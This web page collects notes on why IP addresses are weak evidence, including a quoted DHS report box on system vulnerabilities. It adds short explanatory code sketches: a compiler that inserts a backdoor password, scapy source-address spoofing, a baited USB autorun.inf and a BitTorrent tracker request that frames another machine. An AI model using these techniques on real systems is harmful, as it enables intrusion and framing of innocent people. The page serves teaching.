IP address doctrine

  • http://dmca.cs.washington.edu/ (a sketch of the framing technique used by this study appears at the end of this page)
    • « We were able to generate hundreds of real DMCA takedown notices for computers at the University of Washington that never downloaded nor shared any content whatsoever. »
    • « We were able to remotely generate complaints for nonsense devices including several printers. »
  • Julian Green was acquitted after being accused of possessing pornographic images on his PC; they had been planted by a Trojan horse. The NYT notes that this is the first case of a defendant using this defense.
  • Security Engineering by Ross Anderson. Some chapters of the second edition are available online; the first edition is available in full. The difficulty is that the book is exhaustive, but it must surely contain the "right" sentence somewhere.
  • IP address spoofing: a presentation by Hervé Schauer (HSC) on IP spoofing techniques (1999).
  • References from Wikipedia:

BOX 2.4: Possible Points of Vulnerability in Information Technology Systems and Networks
An information technology system or network has many places where an operationally exploitable vulnerability can be found; in principle, a completely justifiable trust in the system can be found only in environments that are completely under the control of the party who cares most about the security of the system. As discussed here, the environment consists of many things, all of which must be under the interested party’s control.
The software is the most obvious set of vulnerabilities. In a running operating system or application, exploitable vulnerabilities may be present as the result of faulty program design or implementation, and viruses or worms may be introduced when the system or network comes in electronic contact with a hostile source. But there are more subtle paths by which vulnerabilities can be introduced as well. For example, compilers are used to generate object code from source code. The compiler itself must be secure, for it could introduce object code that subversively and subtly modifies the functionality represented in the source code. A particular sequence of instructions could exploit an obscure and poorly known characteristic of hardware functioning, which means that programmers well versed in minute behavioral details of the machine on which the code will be running could introduce functionality that would likely go undetected in any review of the code.
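
The compiler scenario above is Ken Thompson's "Reflections on Trusting Trust" attack, cited in the SOURCES at the end of this box. Thompson's version also re-inserts itself whenever the compiler compiles itself, so the subversion survives recompilation from clean source; the toy Python sketch below shows only the first half of the idea, with invented names throughout:

    # Toy illustration of a subverted "compiler" (here: a trivial
    # source-to-source pass) that recognizes a login routine in the code
    # it processes and silently injects a backdoor.
    BACKDOOR = 'if password == "letmein": return True  # injected\n    '

    def compile_source(source: str) -> str:
        """Stand-in for compilation: pass the source through unchanged,
        except that any recognized password check gains a master password."""
        target = "def check_password(user, password):\n    "
        if target in source:
            source = source.replace(target, target + BACKDOOR)
        return source

    legit = ("def check_password(user, password):\n"
             "    return lookup_hash(user) == hash(password)\n")
    print(compile_source(legit))  # the output now accepts "letmein" for anyone

A review of the legitimate source would find nothing wrong; the subversion exists only in the compiler and in the object code it emits.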
The hardware constitutes another set of vulnerabilities, although less attention is usually paid to hardware in this regard. Hardware includes microprocessors, microcontrollers, firmware, circuit boards, power supplies, peripherals such as printers or scanners, storage devices, and communications equipment such as network cards. On the one hand, hardware is physical, so tampering with these components requires physical access at some point in the hardware’s life cycle, which may be difficult to obtain. On the other hand, hardware is difficult to inspect, so hardware compromises are hard to detect. Consider, for example, that graphics display cards often have onboard processors and memory that can support an execution stream entirely separate from that running on a system’s “main” processor. Also, peripheral devices, often with their own microprocessor controllers and programs, can engage in bidirectional communications with their hosts, providing a possible vector for outside influence. And, of course, many systems rely on a field-upgradable read-only memory (ROM) chip to support a boot sequence, and corrupted or compromised ROMs could prove harmful in many situations.
The communications channels between the system or network and the “outside” world present another set of vulnerabilities. In general, a system that does not interact with anyone is secure, but it is also largely useless. Thus, communications of some sort must be established, and those channels can be compromised: for example, by spoofing (an adversary pretends to be the “authorized” system), by jamming (an adversary denies access to anyone else), or by eavesdropping (an adversary obtains information intended to be confidential).
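
To make the spoofing point concrete (this is also the subject of Hervé Schauer's 1999 presentation listed above), here is a minimal source-address forgery sketch using the scapy library; the addresses are documentation-range placeholders, and sending raw packets requires administrator privileges:

    # Forge the source address of a TCP SYN packet with scapy.
    # Any reply goes to the forged address, not to the actual sender.
    from scapy.all import IP, TCP, send

    packet = IP(src="203.0.113.5",   # forged source (placeholder address)
                dst="198.51.100.7")  # target (placeholder address)
    syn = TCP(sport=4444, dport=80, flags="S")  # TCP connection request
    send(packet / syn)

This is also why a logged source IP address is weak evidence of who actually sent a packet.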
Operators and users present a particularly challenging set of vulnerabilities. Both can be compromised through blackmail or extortion. Or, untrustworthy operators and users can be planted as spies. But users can also be tricked into actions that compromise security. For example, in one recent exploit, a red team used inexpensive universal serial bus (USB) flash drives to penetrate an organization’s security. The red team scattered USB drives in parking lots, smoking areas, and other areas of high traffic. In addition to some innocuous images, each drive was preprogrammed with software that would collect passwords, log-ins, and machine-specific information from the user’s computer, and then e-mail the findings to the red team. Because many systems support an “auto-run” feature for insertable media (i.e., when the medium is inserted, the system automatically runs a program named “autorun.exe” on the medium) and the feature is often turned on, the red team was notified as soon as the drive was inserted. The result: 75 percent of the USB drives distributed were inserted into a computer.
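
For reference, the Windows auto-run feature described here is actually driven by an autorun.inf file at the root of the medium, which names the program to launch, rather than by a fixed "autorun.exe". A hypothetical autorun.inf of the kind such drives might carry (the file names are invented):

    [autorun]
    ; launched automatically where AutoRun is enabled for removable media
    open=slideshow.exe
    icon=photos.ico
    action=View photos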
Given the holistic nature of security, it is also worth noting that vulnerabilities can be introduced at every point in the supply chain: that is, systems (and their components) can be attacked in design, development, testing, production, distribution, installation, configuration, maintenance, and operation. On the way to a customer, a set of CD-ROMs may be intercepted and a different set introduced in its place; extra functionality might be introduced during chip fabrication or motherboard assembly; a default security configuration might be left in an insecure state; and the list goes on.
Given the dependence of security on all of these elements in the supply chain, it is not unreasonable to think of security as an emergent property of a system, as its architecture is implemented, its code instantiated, and as the system itself is embedded in a human and an organizational context. In practice, this means that the actual vulnerabilities that a system must resist are specific to that particular system embedded in its particular context. This fact should not discourage the development of generic building blocks for security that might be assembled in a system-specific way, but it does mean that an adversary could attack many possible targets in its quest to compromise a system or a network.
SOURCES:
  • Information on compilers based on Ken Thompson, “Reflections on Trusting Trust,” Communications of the ACM 27(8): 761-763, August 1984. See also P.A. Karger and R.R. Schell, “Thirty Years Later: Lessons from the Multics Security Evaluation,” pp. 119-126 in Proceedings of the 18th Annual Computer Security Applications Conference, December 9-13, 2002, Las Vegas, Nev.: IEEE Computer Society. Available at http://www.acsa-admin.org/2002/papers/classic-multics.pdf.
  • Information on USB drives: Steve Stasiukonis, “Social Engineering, the USB Way,” Dark Reading, June 7, 2006. Available at http://www.darkreading.com/document.asp?doc_id=95556&WT.svl=column1_1.
  • Information on chip fabrication based on Defense Science Board, High Performance Microchip Supply, Department of Defense, February 2005. Available at http://www.acq.osd.mil/dsb/reports/2005-02-HPMS_Report_Final.pdf.

Source: Toward a Safer and More Secure Cyberspace http://www.cyber.st.dhs.gov/docs/Toward_a_Safer_and_More_Secure_Cyberspace-Full_report.pdf
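
The dmca.cs.washington.edu study cited at the top of this page framed arbitrary IP addresses by exploiting the fact that a BitTorrent tracker identifies peers from unverified request data: the HTTP announce defined in the original BitTorrent specification accepts an optional ip parameter. A hypothetical Python sketch of that framing step (the tracker URL, info hash, and addresses below are placeholders, and a real tracker may or may not honor the parameter):

    # Sketch of the "framing" technique behind the dmca.cs.washington.edu
    # study: register an arbitrary address (e.g., a printer's) as a peer in
    # a BitTorrent swarm without that machine ever participating.
    import urllib.parse

    TRACKER_URL = "http://tracker.example.org/announce"  # placeholder
    INFO_HASH = b"\x00" * 20  # 20-byte torrent info hash (placeholder)
    FRAMED_IP = "192.0.2.42"  # address of the framed device (placeholder)

    params = {
        "info_hash": INFO_HASH,              # torrent supposedly being shared
        "peer_id": b"-XX0001-001122334455",  # arbitrary 20-byte peer id
        "port": 6881,        # port the framed host supposedly listens on
        "uploaded": 0,
        "downloaded": 0,
        "left": 0,
        "ip": FRAMED_IP,     # optional and unverified: the tracker lists it
    }

    # Sending this GET request would cause the tracker to hand FRAMED_IP out
    # to anyone monitoring the swarm, including copyright enforcement agents.
    print(TRACKER_URL + "?" + urllib.parse.urlencode(params))

Monitoring agencies that harvest peer lists from trackers, rather than exchanging actual data with each peer, would then send DMCA notices to the framed address; this is how the study's printers received takedown notices.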